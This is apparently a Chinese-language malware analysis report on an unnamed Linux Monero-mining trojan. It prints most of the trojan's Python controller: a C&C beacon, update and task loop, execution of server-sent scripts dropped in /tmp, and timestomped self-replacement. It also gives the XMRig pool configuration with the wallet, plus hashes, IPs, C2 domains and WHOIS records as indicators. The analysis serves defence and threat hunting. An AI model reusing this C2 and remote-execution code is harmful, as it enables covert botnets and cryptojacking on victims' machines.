木马简介
背景
碰到一个挖矿木马,谷歌搜索没有找到相关的资料,暂时命名为无名矿马,挖矿程序是开源的XMRig(编译好后名字为update)。整个控制端依靠一个随机名python文件。
rc.local中有/etc/update
样本相关文件
一个随机名字的python文件和一个随机名字的python命令文件,用来执行自己的Python脚本程序。这个脚本会和C&C Server通信,来传输指令获取script,运行,开始挖矿。
Python脚本主要恶意功能
代码片段一:
if __name__ == "__main__":
    # Entry point of the sample (Python 2, see `print response` / `except Exception, e` below).
    daemonize()  # standard daemonize code, not discussed further
    # Single-instance guard: file lock on VAR_LOCK (/tmp/.<VAR_SIGN>.lock); a second copy exits with status 3.
    if not global_lock(VAR_LOCK):
        sys.exit(3)
    # Key point: all C&C interaction happens on one Schedule thread; main thread just waits on it.
    d = Schedule()
    d.start()
    d.join()
代码片段二:
class Schedule(threading.Thread):
    """C&C loop of the sample.

    One thread that, on its own timers, sends three message types over a
    single socket: 'alive' (beacon), 'update' (fetch a replacement for this
    script) and 'task' (fetch a script to run). The server reply is a dict;
    a 'delay' key lets the server set the next interval for each type.

    ops_send / ops_recv / sch_check_host / TaskExec / self_upgrade /
    gen_file_name are defined elsewhere in the sample and are not shown here.
    """
    def __init__(self):
        threading.Thread.__init__(self)
        self.inited = False  # set by init() on the first run() iteration
        # Next-due timestamps for the three C&C interactions.
        self.time_alive = datetime.datetime.now()
        self.time_update = datetime.datetime.now()
        self.time_task = datetime.datetime.now()
        self.s = None  # current C&C socket; None while closed
        self.sock_ref = 0  # reference count on self.s (see socket_connect/socket_close)
        self.list_records = []  # not referenced anywhere in the code shown here
        self.lock_records = thread.allocate_lock()  # Python 2 `thread` module
        self.select_host = ""  # not referenced anywhere in the code shown here
        self.select_port = ""
    def init(self):
        """First-run scheduling: beacon and task poll in 1 min, update check in 10 min."""
        self.time_alive = datetime.datetime.now() + datetime.timedelta(minutes=1)
        # self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=3)
        self.time_task = datetime.datetime.now() + datetime.timedelta(minutes=1)
        self.time_update = datetime.datetime.now() + datetime.timedelta(minutes=10)
        self.inited = True
        pass
    def task_result(self, idx, result):
        """Callback for synchronous tasks: report the task output to the C&C.

        Args:
            idx: task id as received in the 'task' response.
            result: raw task output; sent base64-encoded.
        Releases the socket reference taken in task_exec().
        """
        data = {'msg': 'task', 'id': idx, 'result': base64.b64encode(result)}
        ops_send(self.s, data)
        self.socket_close()  # release sock
    def task_exec(self, task_id, script, sync, timeout=None):
        """Drop the server-supplied script to a random /tmp/sess_* file and run it.

        Args:
            task_id: id echoed back via task_result() for sync tasks.
            script: decoded script body from the 'task' response.
            sync: if truthy, a socket reference is taken here and the result is
                  sent back through task_result().
            timeout: passed through to TaskExec; semantics not visible here.
        The drop file is unlinked ~0.5s after TaskExec.run() returns; whether an
        asynchronous task can still be using it at that point depends on
        TaskExec, which is not shown.
        """
        filename = gen_file_name()
        f = open(filename, 'w')
        f.write(script)
        # NOTE(review): the literal below looks like "\n" whose escape was lost in extraction.
        f.write("
")
        f.close()
        t = TaskExec(filename, sync, timeout, task_id)
        if sync:
            self.socket_connect()
            t.set_cb(self.task_result)
        t.run()
        time.sleep(0.5)
        try:
            os.unlink(filename)
        except:
            pass
    def socket_connect(self):
        """Return the C&C socket, connecting via sch_check_host() on first use.

        Each successful call bumps sock_ref; pair it with socket_close().
        Returns None when no C&C host could be reached.
        """
        if not self.s:
            self.s = sch_check_host()
        if not self.s:
            return None
        self.sock_ref += 1
        return self.s
    def socket_close(self):
        """Drop one reference; the socket is actually closed when the count hits 0.

        No lower bound is enforced: an unpaired call makes sock_ref negative and
        the socket is then never closed by this path.
        """
        self.sock_ref -= 1
        if self.sock_ref == 0:
            self.s.close()
            self.s = None
    def alive(self):
        """Beacon: send {'msg': 'alive'}; a 'delay' in the reply sets the next beacon time."""
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'alive'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return
        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        pass
    def update(self):
        """Update check: send {'msg': 'update'}; if the reply carries 'script',
        hand it to self_upgrade(), which overwrites this file and re-executes it.
        'delay' in the reply sets the next update-check time.
        """
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'update'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return
        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'delay' in response.keys():
            self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
        if 'script' not in response.keys():
            return
        self_upgrade(response['script'])
    def task(self):
        """Task poll: send {'msg': 'task'}; a reply with 'script' (base64) is run
        via task_exec() with the reply's 'id', 'sync' and 'timeout'.

        Original indentation was lost in extraction, so it is not clear whether
        the time_task assignment belongs to the 'script' branch; if it does, a
        reply without 'script' leaves the +60s fallback set in run() in place.
        """
        sock = self.socket_connect()
        if not sock:
            return
        data = {'msg': 'task'}
        result = ops_send(sock, data)
        if not result:
            self.socket_close()
            return
        result, response = ops_recv(sock)
        if not result:
            self.socket_close()
            return
        self.socket_close()
        print response
        if type(response) is not dict:
            return
        if 'script' in response.keys():
            self.task_exec(response['id'], base64.b64decode(response['script']), response['sync'], response['timeout'])
            self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=response['delay'])
    def run(self):
        """Scheduler loop, ticking once per second.

        Before each call the corresponding timer is pushed 60s ahead, so a call
        that fails or raises is simply retried a minute later; the server's
        'delay' overrides that inside alive()/update()/task(). All exceptions
        are swallowed (Python 2 `except Exception, e` syntax).
        """
        while True:
            if not self.inited:
                self.init()
            cur_time = datetime.datetime.now()
            if cur_time > self.time_alive:
                try:
                    self.time_alive = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.alive()
                except Exception, e:
                    pass
            if cur_time > self.time_update:
                try:
                    self.time_update = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.update()
                except Exception, e:
                    pass
            if cur_time > self.time_task:
                try:
                    self.time_task = datetime.datetime.now() + datetime.timedelta(seconds=60)
                    self.task()
                except Exception, e:
                    pass
            # self.task_result()
            time.sleep(1)
可以看到一共执行三个有效通信函数:alive(),update(),task(),其中还涉及ops_send和ops_recv两个函数,都是socket通信,另外self_upgrade实现自我升级。self.task_exec()会下载矿马和配置文件运行开始挖矿。
def self_upgrade(script):
    """Overwrite this script with a C&C-supplied body and re-launch it.

    Args:
        script: new script contents from the 'update' response.

    Forensic notes: atime/mtime are restored after the write (timestomping),
    so mtime-based triage will not show the update. os.utime takes
    (atime, mtime) but is handed (ctime, mtime), so atime ends up equal to
    the old ctime; ctime itself cannot be set this way and still reflects the
    rewrite. The shell line then chmods the file, kills the current pid and
    starts the new file.
    """
    self_file = os.path.abspath(__file__)
    ftime = (os.path.getctime(self_file), os.path.getmtime(self_file))
    f = open(self_file, 'w')
    f.write(script)
    f.close()
    os.utime(self_file, ftime)
    # NOTE(review): the inner quotes of this command appear to have lost their escaping in extraction.
    subprocess.Popen("sh -c "chmod +x %s;kill -9 %d;%s"" % (self_file, os.getpid(), self_file), shell=True)
生成文件
通过代码可以看到,会在/tmp下生成sess_后面跟随机字符串的文件,用来存储C&C Server发来的Payload,但是也会看到很多这类文件大小为0,应该是C&C Server不会每次都传过来吧。
VAR_LOC = "/tmp"  # drop directory for task scripts (see gen_file_name)
VAR_PFX = "sess_"  # drop-file prefix; dropped files match /tmp/sess_*
VAR_LOCK = '/tmp/.%s.lock' % VAR_SIGN  # single-instance lock file; VAR_SIGN is defined outside this excerpt
...
def gen_file_name(path=VAR_LOC, prefix=VAR_PFX, length=26):
    """Build a random drop-file path: <path>/<prefix><length chars of [a-z0-9]>
    with VAR_SIGN spliced in at a random offset.

    Args:
        path: directory, defaults to VAR_LOC ("/tmp").
        prefix: file-name prefix, defaults to VAR_PFX ("sess_").
        length: number of random characters before the marker is spliced in.
    Returns:
        The joined path as a string.

    Forensic note: every dropped file therefore matches /tmp/sess_* and has
    the VAR_SIGN marker somewhere in its name. VAR_SIGN is defined outside
    this excerpt; the lock-file IOC /tmp/.ops.lock listed on this page is
    consistent with VAR_SIGN being "ops" — confirm against the sample.
    """
    list_content = []
    name = ""
    charsets = [(97, 26), (48, 10)]  # ord('a')..'z' and ord('0')..'9'
    for (start, count) in charsets:
        for i in range(0, count):
            list_content.append(chr(start + i))
    for i in range(0, length):
        name += str(list_content[random.randint(0, len(list_content) - 1)])
    # Overwrite len(VAR_SIGN) characters at a random offset with the marker.
    index = random.randint(0, length - len(VAR_SIGN))
    # name[index:index+4] = "oops"
    name = name[:index] + VAR_SIGN + name[index + len(VAR_SIGN):]
    return os.path.join(path, prefix + name)
网络通信行为
根据脚本运行抓包来看
与代码中的网络通信行为保持一致。
从代码和网络通信行为的结果来看,可以得到如下IOC:
挖矿的配置都在config.json中
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": true, // true to run the miner in the background
"colors": false, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 80, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 30, // print hashrate report every N seconds
"retries": 500, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"threads": null, // number of miner threads
"pools": [
{
"url": "pool.minexmr.com:443", // URL of mining server
"user": "44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false, // enable nicehash/xmrig-proxy support
"variant": -1 // algorithm PoW variant
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}
钱包:44HEguZchqb3NEPePEuJicYWMwhQTFhGPDx6HroGHy5j8ycaWb6DL8YY2djPySmfzQLwAYfg7y12F3AqLeUhSB4VCpXnWvm.3673782466
矿池:pool.minexmr.com:443
IOC
文件名
py文件:可以根据域名检索,因为其名字会变,且文件第一行的 #!/sbin/regdbdump 是随机路径和名字,所以hash值不统一;
引导Python脚本的文件,随机名称,hash值见下;
config.json hash值见下
/tmp/.ops.lock
文件hash值
update
MD5: D8D311F7822DDAB5888A59313224E0A4
SHA1: 27752629A75588C029F1AF191AB40DC0ECAF9C64
随机文件名的python运行命令文件
MD5: 6078CE87E5E2A7448AC192E2AB1CA2DF
SHA1: 00E7805857F2C7A944B86CDF29C33D7022CDC7B8
config.json
MD5: 107E4289A3AA1E3F499E8629D2FB4612
SHA1: CB67E8E8C1A7660FF77F83E9B54679AEBC7C710B
IP地址
167.88.176.177
103.224.81.48
103.19.3.166
118.193.149.7
Domain域名
kernelpatch.info
rhelupdate.info
whois信息
kernelpatch.info
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer: whois.afilias.net
domain: INFO
organisation: Afilias Limited
address: Office 107
address: 3013 Lake Drive
address: CityWest
address: Dublin 24
address: Ireland
contact: administrative
name: Ram Mohan
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domainadmin@afilias.info
contact: technical
name: Howard Eland
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domaintech@afilias.info
nserver: A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver: A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver: B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver: B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver: C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver: D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata: 8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata: 8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b
whois: whois.afilias.net
status: ACTIVE
remarks: Registration information: http://www.nic.info
created: 2001-06-26
changed: 2015-09-09
source: IANA
Domain Name: KERNELPATCH.INFO
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:51:08Z <<<
Domain Name: kernelpatch.info
Registry Domain ID: D503300000103900891-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:13Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615890
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: kernelpatch.info@domainsbyproxy.com
Registry Admin ID: CR325615893
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: kernelpatch.info@domainsbyproxy.com
Registry Tech ID: CR325615892
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: kernelpatch.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<
rhelupdate.info
% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer: whois.afilias.net
domain: INFO
organisation: Afilias Limited
address: Office 107
address: 3013 Lake Drive
address: CityWest
address: Dublin 24
address: Ireland
contact: administrative
name: Ram Mohan
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domainadmin@afilias.info
contact: technical
name: Howard Eland
organisation: Afilias Limited
address: C/O Afilias USA, Inc.
address: 300 Welsh Road, Building 3
address: Suite 105
address: Horsham Pennsylvania 19044
address: United States
phone: +1 215 706 5700
fax-no: +1 215 706 5701
e-mail: domaintech@afilias.info
nserver: A0.INFO.AFILIAS-NST.INFO 199.254.31.1 2001:500:19:0:0:0:0:1
nserver: A2.INFO.AFILIAS-NST.INFO 199.249.113.1 2001:500:41:0:0:0:0:1
nserver: B0.INFO.AFILIAS-NST.ORG 199.254.48.1 2001:500:1a:0:0:0:0:1
nserver: B2.INFO.AFILIAS-NST.ORG 199.249.121.1 2001:500:49:0:0:0:0:1
nserver: C0.INFO.AFILIAS-NST.INFO 199.254.49.1 2001:500:1b:0:0:0:0:1
nserver: D0.INFO.AFILIAS-NST.ORG 199.254.50.1 2001:500:1c:0:0:0:0:1
ds-rdata: 8674 7 1 197789a2cbaba6fecd0b5ac88c5bc414ce1fc309
ds-rdata: 8674 7 2 ec9b6082b96b5f87143696f2b483acc9b2c433dce0c94e70f1ff5648ca18008b
whois: whois.afilias.net
status: ACTIVE
remarks: Registration information: http://www.nic.info
created: 2001-06-26
changed: 2015-09-09
source: IANA
Domain Name: RHELUPDATE.INFO
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registry Expiry Date: 2019-05-31T02:26:13Z
Registrar Registration Expiration Date:
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Reseller:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2018-07-03T11:53:34Z <<<
Domain Name: rhelupdate.info
Registry Domain ID: D503300000103900892-LRMS
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-05-31T02:26:14Z
Creation Date: 2018-05-31T02:26:13Z
Registrar Registration Expiration Date: 2019-05-31T02:26:13Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR325615889
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 14455 N. Hayden Road
Registrant City: Scottsdale
Registrant State/Province: Arizona
Registrant Postal Code: 85260
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: rhelupdate.info@domainsbyproxy.com
Registry Admin ID: CR325615894
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 14455 N. Hayden Road
Admin City: Scottsdale
Admin State/Province: Arizona
Admin Postal Code: 85260
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: rhelupdate.info@domainsbyproxy.com
Registry Tech ID: CR325615891
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 14455 N. Hayden Road
Tech City: Scottsdale
Tech State/Province: Arizona
Tech Postal Code: 85260
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: rhelupdate.info@domainsbyproxy.com
Name Server: NS01.DOMAINCONTROL.COM
Name Server: NS02.DOMAINCONTROL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2018-07-03T11:00:00Z <<<